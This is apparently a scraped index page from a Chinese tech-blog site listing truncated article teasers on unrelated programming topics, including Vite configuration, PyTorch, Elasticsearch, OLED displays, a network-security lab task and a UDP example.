设计高手的秘密武器:7款卓越的PPT工具推荐

1.即时设计 使用模板制作ppt可以帮助设计师节省工作时间&#xff0c;减轻工作压力。在即时设计资源广场为设计师提供各种精美的设计材料&#xff0c;可以有效地帮助设计师节省时间和高效地完成工作任务。此外&#xff0c;设计师还可以重新更改这些设计材料&#xff0c;以满足设…

vite前端项目根据不同环境切换不同的请求域名,5分钟搞定

有能力的可以直接看vite官方文档&#xff1a;环境变量和模式 | Vite 官方中文文档 简单操作步骤&#xff1a;创建不同环境的配置文件&#xff0c;在配置文件中声明VITE_开头的变量并赋值&#xff0c;然后在项目中引入这个变量并使用。 创建配置文件 一般分为开发模式和生产模…

PyTorch 进阶指南,10个必须知道的原则

PyTorch 是一种流行的深度学习框架&#xff0c;它提供了强大的工具和灵活的接口&#xff0c;使得开发者能够搭建和训练各种神经网络模型。这份指南旨在为开发者提供一些有用的原则&#xff0c;以帮助他们在PyTorch中编写高效、可维护和可扩展的代码。 如果你对 Pytorch 还处于…

【ES】es介绍

倒排索引&#xff08;Inverted Index&#xff09;和正排索引&#xff08;Forward Index&#xff09; 正排索引是一种以文档为单位的索引结构&#xff0c;它将文档中的每个单词或词组与其所在的文档进行映射关系的建立。正排索引通常用于快速检索指定文档的内容&#xff0c;可以…

华为鸿蒙(HarmonyOS)介绍

华为鸿蒙&#xff08;HarmonyOS&#xff09;介绍 华为鸿蒙&#xff08;HarmonyOS&#xff09;是一款由华为自主研发的操作系统&#xff0c;旨在为各种智能设备提供一种统一、高效、安全的解决方案。鸿蒙系统基于微内核架构&#xff0c;可以应用于多种类型的设备&#xff0c;鸿…

32阵元 MVDR和DREC DOA估计波束方向图对比

32阵元 MVDR和DREC DOA估计波束方向图对比 一、原理 MVDR原理&#xff1a;https://zhuanlan.zhihu.com/p/457528114 DREC原理&#xff08;无失真响应特征干扰相消器&#xff09;&#xff1a;http://radarst.ijournal.cn/html/2019/3/201903018.html 主要参数&#xff1a; 阵…

高效Java开发分析:JProfiler 14 for Mac中文

JProfiler允许你对运行中的Java应用程序进行实时性能分析。它提供了丰富的统计数据、图表和概览&#xff0c;帮助你了解应用程序的CPU使用情况、内存使用情况、线程活动等。你可以追踪和识别性能瓶颈&#xff0c;并快速定位问题所在。 内存分析&#xff1a;软件提供了强大的内…

中职网络安全Server2002——Web隐藏信息获取

B-2&#xff1a;Web隐藏信息获取 任务环境说明&#xff1a; 服务器场景名&#xff1a;Server2002&#xff08;关闭链接&#xff09;服务器场景用户名&#xff1a;未知 有问题需要环境加q 通过本地PC中渗透测试平台Kali使用Nmap扫描目标靶机HTTP服务子目录&#xff0c;将扫描子…

js_常用事件演示

✨前言✨ 1.如果代码对您有帮助 欢迎点赞&#x1f44d;收藏⭐哟 后面如有问题可以私信评论哟&#x1f5d2;️ 2.博主后面将持续更新哟&#x1f618;&#x1f389;文章目录 &#x1f354;一、在JavaScript中什么是事件&#xff1f;&#x1f35f;二、为什么要使用事件&#x…

如何在数字世界复刻一个高还原、高拟真的“你”?

本文为「云端智能剪辑」实践指南第五期&#xff0c;通过阿里云智能媒体服务IMS完成数字人形象训练、人声克隆定制&#xff0c;并使用Timeline实现视频合成及创作&#xff0c;打造一个“声形俱佳”的数字分身。 橙鲤&#xff5c;作者 形象日益逼真、交互更为顺畅&#xff0c;虚…

Python搭建代理IP池实现存储IP的方法

目录 前言 1. 介绍 2. IP存储方法 2.1 存储到数据库 2.2 存储到文件 2.3 存储到内存 3. 完整代码示例 总结 前言 代理IP池是一种常用的网络爬虫技术&#xff0c;可以用于反爬虫、批量访问目标网站等场景。本文介绍了使用Python搭建代理IP池&#xff0c;并实现IP存储的…

软件开发模式

瀑布式开发 在瀑布式开发中&#xff0c;开发严格遵循预先计划的需求分析、设计、编码、集成、测试、维护的步骤进行&#xff0c;步骤的成果作为衡量进度的方法&#xff0c;例如需求规格、设计文档、测试计划和代码审阅等&#xff0c; 瀑布式开发最早强调系统开发应有完整的周期…

文档智能翻译,保留文档原有布局,版式还原

翻译能力&#xff1a; 使用讯飞的AI翻译能力&#xff1a;机器翻译 niutrans - 语音扩展 - 讯飞开放平台API&#xff1a; 机器翻译niutrans API 文档 | 讯飞开放平台文档中心 执行效果&#xff1a; 原文档&#xff1a; 翻译还原的文档&#xff1a; 源码如下&#xff1a; impor…

AOT编程

1. AOT与JIT AOT&#xff1a;Ahead-of-Time&#xff08;提前编译&#xff09;&#xff1a;程序执行前&#xff0c;全部被编译成机器码 JIT&#xff1a;Just in Time&#xff08;即时编译&#xff09;: 程序边编译&#xff0c;边运行&#xff1b; 编译&#xff1a; 源代码&a…

oled显示汉字字体 形状 使用

oled模块的工作原理 oled的上方四个接口是IIC总线 通过IIC总线可以进行数据的传输 在OLED模块背后有一个芯片叫做SSD1306 这个芯片内部有1024个字节的RAM 对应到右边的小屏幕上就有1024个字节 一个字节八个bit位 每一个bit位就对应着一个小点 我们只需要往oled的RAM上写入数据就…

TPRI-DMP平台介绍

TPRI-DMP平台介绍 TPRI-DMP平台概述 TPRI-DMP为华能集团西安热工院自主产权的工业云PaaS平台&#xff0c;已经过13年的发展和迭代&#xff0c;其具备大规模能源电力行业生产应用软件开发和运行能力。提供TPRI-DMP平台主数据管理、业务系统开发与运行、应用资源管理与运维监控…

新能源光伏行业CRM:推动绿色能源发展与高效客户管理的双重突破

随着“碳中和”计划以及传统能源价格的不断飙升&#xff0c;我国新能源光伏产业在国家“双碳”战略目标和市场需求的双重驱动下高歌猛进&#xff0c;中国光伏产业新增装机量、累计装机量连续多年位居全球首位。CRM在光伏产业中的作用也日益突出。下面为您介绍新能源光伏行业的C…

UDP单播

CMakeLists.txt文件中添加如下行&#xff1a; link_libraries(ws2_32) 1.发送端 #include <iostream> #include <winsock2.h> #include <cstdio>#pragma comment(lib, "Ws2_32.lib") // Link with ws2_32.libint main() {1.Initialize winsock…